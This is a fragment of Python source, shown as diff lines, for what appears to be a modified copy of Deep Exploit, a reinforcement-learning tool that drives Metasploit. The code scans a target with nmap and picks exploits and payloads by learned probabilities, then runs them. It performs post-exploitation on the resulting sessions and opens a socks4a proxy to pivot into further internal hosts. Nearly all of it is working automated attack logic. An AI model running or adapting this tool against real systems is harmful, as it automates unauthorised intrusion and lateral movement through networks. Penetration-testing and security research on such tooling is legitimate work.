- self.env = Metasploit(rhost)
- self.agent = Agent(name, parameter_server)
- self.util = Utilty()
-
- def run(self, exploit_tree, target_tree):
- self.agent.brain.pull_parameter_server() # Copy ParameterSever weight to LocalBrain
- global frames # Total number of trial in total session.
- global isFinish # Finishing of learning/testing flag.
- global exploit_count # Number of successful exploitation.
- global post_exploit_count # Number of successful post-exploitation.
- global plot_count # Exploitation count list for plot.
- global plot_pcount # Post-exploit count list for plot.
-
- if self.thread_type == 'test':
- # Execute exploitation.
- self.util.print_message(NOTE, 'Execute exploitation.')
- session_list = []
- for port_num in com_port_list:
- execute_list = []
- target_info = {}
- module_list = target_tree[port_num]['exploit']
-
- for exploit in module_list:
- target_list = exploit_tree[exploit[8:]]['target_list']
- for target in target_list:
- skip_flag, s, payload_list, target_info = self.env.get_state(exploit_tree,
- target_tree,
- port_num,
- exploit,
- target)
- if skip_flag is False:
- # Get available payload index.
- available_actions = self.env.get_available_actions(payload_list)
-
- # print("available_actions",available_actions)
- #
- # print("payload_list", payload_list)
-
- # Decide action using epsilon greedy.
- frames = self.env.eps_steps
- _, _, p_list = self.agent.act(s, available_actions, self.env.eps_steps)
- # Append all payload probabilities.
- if p_list is not None:
- for prob in p_list:
- execute_list.append([prob[1], exploit, target, prob[0], target_info])
- else:
- continue
-
- # Execute action.
- execute_list.sort(key=lambda s: -s[0])
- for idx, exe_info in enumerate(execute_list):
- # Execute exploit.
- _, _, done, sess_info = self.env.execute_exploit(exe_info[3],
- self.name,
- self.thread_type,
- exe_info[2],
- exe_info[4],
- idx,
- exploit_tree)
-
- # Store session information.
- if len(sess_info) != 0:
- session_list.append(sess_info)
-
- # Change port number for next exploitation.
- if done is True:
- break
-
- # Execute post exploitation.
- new_target_list = []
- for session in session_list:
- self.util.print_message(NOTE, 'Execute post exploitation.')
- self.util.print_message(OK, 'Target session info.\n'
- ' session id : {0}\n'
- ' session type : {1}\n'
- ' target port : {2}\n'
- ' exploit : {3}\n'
- ' target : {4}\n'
- ' payload : {5}'.format(session['id'],
- session['type'],
- session['port'],
- session['exploit'],
- session['target'],
- session['payload']))
- internal_ip_list = self.env.execute_post_exploit(session['id'], session['type'])
- for ip_addr in internal_ip_list:
- if ip_addr not in self.env.prohibited_list and ip_addr != self.env.rhost:
- new_target_list.append(ip_addr)
- else:
- self.util.print_message(WARNING, 'Target IP={} is prohibited.'.format(ip_addr))
-
- # Deep penetration.
- new_target_list = list(set(new_target_list))
- if len(new_target_list) != 0:
- # Launch Socks4a proxy.
- module = 'auxiliary/server/socks4a'
- self.util.print_message(NOTE, 'Set proxychains: SRVHOST={}, SRVPORT={}'.format(self.env.proxy_host,
- str(self.env.proxy_port)))
- option = {'SRVHOST': self.env.proxy_host, 'SRVPORT': self.env.proxy_port}
- job_id, uuid = self.env.client.execute_module('auxiliary', module, option)
- if uuid is None:
- self.util.print_message(FAIL, 'Failure executing module: {}'.format(module))
- isFinish = True
- return
-
- # Further penetration.
- self.env.source_host = self.env.rhost
- self.env.prohibited_list.append(self.env.rhost)
- self.env.isPostExploit = True
- self.deep_run(new_target_list)
-
- isFinish = True
- else:
- # Execute learning.
- skip_flag, s, payload_list, target_list, target_info = self.env.reset_state(exploit_tree, target_tree)
- # If product name is 'unknown', skip.
- if skip_flag is False:
- R = 0
- step = 0
- while True:
- # Decide action (randomly or epsilon greedy).
- available_actions = self.env.get_available_actions(payload_list)
-
-
- a, _, _ = self.agent.act(s, available_actions, self.env.eps_steps)
- # Execute action.
- s_, r, done, _ = self.env.execute_exploit(a,
- self.name,
- self.thread_type,
- target_list,
- target_info,
- step,
- exploit_tree,
- frames)
- step += 1
-
- # Update payload list according to new target.
- payload_list = exploit_tree[target_info['exploit']]['targets'][str(self.env.state[ST_TARGET])]
-
- # If trial exceed maximum number of trials at current episode,
- # finish trial at current episode.
- if step > MAX_STEPS:
- done = True
-
- # Increment frame number.
- frames += 1
-
- # Increment number of successful exploitation.
- if r == R_GOOD:
- exploit_count += 1
-
- # Increment number of successful post-exploitation.
- if r == R_GREAT:
- exploit_count += 1
- post_exploit_count += 1
-
- # Plot number of successful post-exploitation each 100 frames.
- if frames % 100 == 0:
- self.util.print_message(NOTE, 'Plot number of successful post-exploitation.')
- plot_count.append(exploit_count)
- plot_pcount.append(post_exploit_count)
- exploit_count = 0
- post_exploit_count = 0
-
- # Push reward and experience considering advantage.to LocalBrain.
- if a == 'no payload':
- a = len(com_payload_list) - 1
- self.agent.advantage_push_local_brain(s, a, r, s_)
-
- s = s_
- R += r
- # Copy updating ParameterServer weight each Tmax.
- if done or (step % Tmax == 0):
- if not (isFinish):
- self.agent.brain.update_parameter_server()
- self.agent.brain.pull_parameter_server()
-
- if done:
- # Discard the old total reward and keep the latest 10 pieces.
- self.total_reward_vec = np.hstack((self.total_reward_vec[1:], step))
- # Increment total trial number of thread.
- self.count_trial_each_thread += 1
- break
-
- # Output total number of trials, thread name, current reward to console.
- self.util.print_message(OK, 'Thread: {}, Trial num: {}, '
- 'Step: {}, Avg step: {}'.format(self.name,
- str(self.count_trial_each_thread),
- str(step),
- str(self.total_reward_vec.mean())))
-
- # End of learning.
- if frames > MAX_TRAIN_NUM:
- self.util.print_message(OK, 'Finish train:{}'.format(self.name))
- isFinish = True
- self.util.print_message(OK, 'Stopping learning...')
- time.sleep(30.0)
- # Push params of thread to ParameterServer.
- self.agent.brain.push_parameter_server()
-
- # Further penetration.
- def deep_run(self, target_ip_list):
- for target_ip in target_ip_list:
- result_file = 'nmap_result_' + target_ip + '.xml'
- command = self.env.nmap_2nd_command + ' ' + result_file + ' ' + target_ip + '\n'
- self.env.execute_nmap(target_ip, command, self.env.nmap_2nd_timeout)
- com_port_list, proto_list, info_list = self.env.get_port_list(result_file, target_ip)
-
- # Get exploit tree and target info.
- exploit_tree = self.env.get_exploit_tree()
- target_tree = self.env.get_target_info(target_ip, proto_list, info_list)
-
- # Execute exploitation.
- self.env.rhost = target_ip
- self.run(exploit_tree, target_tree)
-
-
- # WorkerThread
- class Worker_thread:
- def __init__(self, thread_name, thread_type, parameter_server, rhost):
- self.environment = Environment(thread_name, thread_type, parameter_server, rhost)
- self.thread_name = thread_name
- self.thread_type = thread_type
- self.util = Utilty()
-
- # Execute learning or testing.
- def run(self, exploit_tree, target_tree, saver=None, train_path=None):
- self.util.print_message(NOTE, 'Executing start: {}'.format(self.thread_name))
- while True:
- if self.thread_type == 'learning':
- # Execute learning thread.
- self.environment.run(exploit_tree, target_tree)
-
- # Stop learning thread.
- if isFinish:
- self.util.print_message(OK, 'Finish train: {}'.format(self.thread_name))
- time.sleep(3.0)
-
- # Finally save learned weights.
- self.util.print_message(OK, 'Save learned data: {}'.format(self.thread_name))
- saver.save(SESS, train_path)
-
- # Disconnection RPC Server.
- self.environment.env.client.termination(self.environment.env.client.console_id)
-
- if self.thread_name == 'local_thread1':
- # Create plot.
- df_plot = pd.DataFrame({'exploitation': plot_count,
- 'post-exploitation': plot_pcount})
- df_plot.to_csv(os.path.join(self.environment.env.data_path, 'experiment.csv'))
- # df_plot.plot(kind='line', title='Training result.', legend=True)
- # plt.savefig(self.environment.env.plot_file)
- # plt.close('all')
-
- # Create report.
- report = CreateReport()
- report.create_report('train', pd.to_datetime(self.environment.env.scan_start_time))
- break
- else:
- # Execute testing thread.
- self.environment.run(exploit_tree, target_tree)
-
- # Stop testing thread.
- if isFinish:
- self.util.print_message(OK, 'Finish test.')
- time.sleep(3.0)
-
- # Disconnection RPC Server.
- self.environment.env.client.termination(self.environment.env.client.console_id)
-
- # Create report.
- report = CreateReport()
- report.create_report('test', pd.to_datetime(self.environment.env.scan_start_time))
- break
-
-
- # Show initial banner.
- def show_banner(util, delay_time=2.0):
- banner = u"""
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- ██████╗ ███████╗███████╗██████╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
- ██╔══██╗██╔════╝██╔════╝██╔══██╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
- ██║ ██║█████╗ █████╗ ██████╔╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
- ██║ ██║██╔══╝ ██╔══╝ ██╔═══╝ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
- ██████╔╝███████╗███████╗██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
- ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ (beta)
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- """
- util.print_message(NONE, banner)
- show_credit(util)
- time.sleep(delay_time)
-
-
- # Show credit.
- def show_credit(util):
- credit = u"""
- =[ Deep Exploit v0.0.2-beta ]=
- + -- --=[ Author : Isao Takaesu (@bbr_bbq) ]=--
- + -- --=[ Website : https://github.com/13o-bbr-bbq/machine_learning_security/ ]=--
- """
- util.print_message(NONE, credit)
-
-
- # Check IP address format.
- def is_valid_ip(rhost):
- try:
- ipaddress.ip_address(rhost)
- return True
- except ValueError:
- return False
-
-
- # Define command option.
- __doc__ = """{f}
- Usage:
- {f} (-t <ip_addr> | --target <ip_addr>) (-m <mode> | --mode <mode>)
- {f} (-t <ip_addr> | --target <ip_addr>) [(-p <port> | --port <port>)] [(-s <product> | --service <product>)]
- {f} -h | --help
-
- Options:
- -t --target Require : IP address of target server.
- -m --mode Require : Execution mode "train/test".
- -p --port Optional : Indicate port number of target server.
- -s --service Optional : Indicate product name of target server.
- -h --help Optional : Show this screen and exit.
- """.format(f=__file__)
-
-
- # Parse command arguments.
- def command_parse():
- args = docopt(__doc__)
- ip_addr = args['<ip_addr>']
- mode = args['<mode>']
- port = args['<port>']
- service = args['<product>']
- return ip_addr, mode, port, service
-
-
- # Check parameter values.
- def check_port_value(port=None, service=None):
- if port is not None:
- if port.isdigit() is False:
- Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
- return False
- elif (int(port) < 1) or (int(port) > 65535):
- Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
- return False
- elif port not in com_port_list:
- Utilty().print_message(OK, 'Not open port number: {}'.format(port))
- return False
- elif service is None:
- Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
- return False
- elif type(service) == 'int':
- Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
- return False
- else:
- return True
- else:
- return False
-
-
- # Common list of all threads.
- com_port_list = []
- com_exploit_list = []
- com_payload_list = []
- com_indicate_flag = False
-
-
- #%%
- # if __name__ == '__main__':
- util = Utilty()
-
- # Get command arguments.
- rhost, mode, port, service = command_parse()
-
- # rhost = "10.12.11.98"
- # mode = "train"
- # port = None
- # service = None
-
- if is_valid_ip(rhost) is False:
- util.print_message(FAIL, 'Invalid IP address: {}'.format(rhost))
- exit(1)
- if mode not in ['train', 'test']:
- util.print_message(FAIL, 'Invalid mode: {}'.format(mode))
- exit(1)
- #%%
- # Show initial banner.
- show_banner(util, 0.1)
- # Initialization of Metasploit.
- env = Metasploit(rhost)
- if rhost in env.prohibited_list:
- util.print_message(FAIL, 'Target IP={} is prohibited.\n'
- ' Please check "config.ini"'.format(rhost))
- exit(1)
-
- root_path = "/home/star/zhanglongyuan/DE"
- nmap_result = root_path+'/nmap_result_' + env.rhost + '.xml'
- nmap_command = env.nmap_command + ' ' + nmap_result + ' ' + env.rhost + '\n'
- env.execute_nmap(env.rhost, nmap_command, env.nmap_timeout)
-
- com_port_list, proto_list, info_list = env.get_port_list(nmap_result, env.rhost)
-
- com_exploit_list = env.get_exploit_list()
- com_payload_list = env.get_payload_list()
- com_payload_list.append('no payload')
-
- #%%
- # Create exploit tree.
- exploit_tree = env.get_exploit_tree()
- # Create target host information.
- com_indicate_flag = check_port_value(port, service)
- if com_indicate_flag:
- target_tree, com_port_list = env.get_target_info_indicate(rhost, proto_list, info_list, port, service)
- else:
- target_tree = env.get_target_info(rhost, proto_list, info_list)
-
-
- #%%
-
- # Initialization of global option.
- TRAIN_WORKERS = env.train_worker_num
- TEST_WORKER = env.test_worker_num
- MAX_STEPS = env.train_max_steps
- MAX_TRAIN_NUM = env.train_max_num
- Tmax = env.train_tmax
-
- env.client.termination(env.client.console_id) # Disconnect common MSFconsole.
- NUM_ACTIONS = len(com_payload_list) # Set action number.
- NONE_STATE = np.zeros(NUM_STATES) # Initialize state (s).
-
- # Define global variable, start TensorFlow session.
- frames = 0 # All trial number of all threads.
- isFinish = False # Finishing learning/testing flag.
- post_exploit_count = 0 # Number of successful post-exploitation.
- exploit_count = 0 # Number of successful exploitation.
- plot_count = [0] # Exploitation count list for plot.
- plot_pcount = [0] # Post-exploit count list for plot.
- SESS = tf.Session() # Start TensorFlow session.
-
- with tf.device("/cpu:0"):
- parameter_server = ParameterServer()
- threads = []
-
- if mode == 'train':
- # Create learning thread.
- for idx in range(TRAIN_WORKERS):
- thread_name = 'local_thread' + str(idx + 1)
- threads.append(Worker_thread(thread_name=thread_name,
- thread_type="learning",
- parameter_server=parameter_server,
- rhost=rhost))
- else:
- # Create testing thread.
- for idx in range(TEST_WORKER):
- thread_name = 'local_thread1'
- threads.append(Worker_thread(thread_name=thread_name,
- thread_type="test",
- parameter_server=parameter_server,
- rhost=rhost))
-
- # Define saver.
- saver = tf.train.Saver()
-
- # Execute TensorFlow with multi-thread.
- COORD = tf.train.Coordinator() # Prepare of TensorFlow with multi-thread.
- SESS.run(tf.global_variables_initializer()) # Initialize variable.
-
- running_threads = []
- if mode == 'train':
- # Load past learned data.
- if os.path.exists(env.save_file) is True:
- # Restore learned model from local file.
- util.print_message(OK, 'Restore learned data.')
- saver.restore(SESS, env.save_file)
-
- # Execute learning.
- for worker in threads:
- job = lambda: worker.run(exploit_tree, target_tree, saver, env.save_file)
- t = threading.Thread(target=job)
- t.start()
- else:
- # Execute testing.
- # Restore learned model from local file.
- util.print_message(OK, 'Restore learned data.')
- saver.restore(SESS, env.save_file)
- for worker in threads:
- job = lambda: worker.run(exploit_tree, target_tree)
- t = threading.Thread(target=job)
- t.start()
|